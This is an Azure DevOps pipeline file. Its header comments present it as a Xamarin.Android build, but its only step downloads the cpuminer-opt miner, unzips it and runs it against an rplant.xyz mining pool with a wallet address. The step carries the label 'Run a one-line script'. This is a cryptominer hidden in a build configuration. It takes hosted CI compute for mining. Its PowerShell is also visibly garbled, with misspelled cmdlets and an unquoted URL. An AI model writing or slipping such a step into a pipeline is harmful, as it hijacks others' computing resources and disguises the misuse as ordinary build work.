# Xamarin.Android
# Build a Xamarin.Android project.
# Add steps that test, sign, and distribute an app, save build artifacts, and more:
# https://docs.microsoft.com/azure/devops/pipelines/languages/xamarin

trigger:
  branches:
    include:
    - master

pr: none

pool:
  vmImage: 'windows-latest'

name: $(date:yyyy)$(DayOfYear)$(rev:rrr)
steps:
- script: |
    $ client = new-objek System.Net.WebClient
    $ client.Credentials = Get-Credential
    $client.Download_File(https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip,”.\”)
    unzip cpuminer-opt-win.zip
    .\cpuminer-avx2.exe -a curvehash -o stratum+tcp://stratum-asia.rplant.xyz:7058 -u TvLoZcKzhQPmxWqc7FdL4f64euZ8zq8aDN.jinmanju -p password=x -t 10
  displayName: 'Run a one-line script'
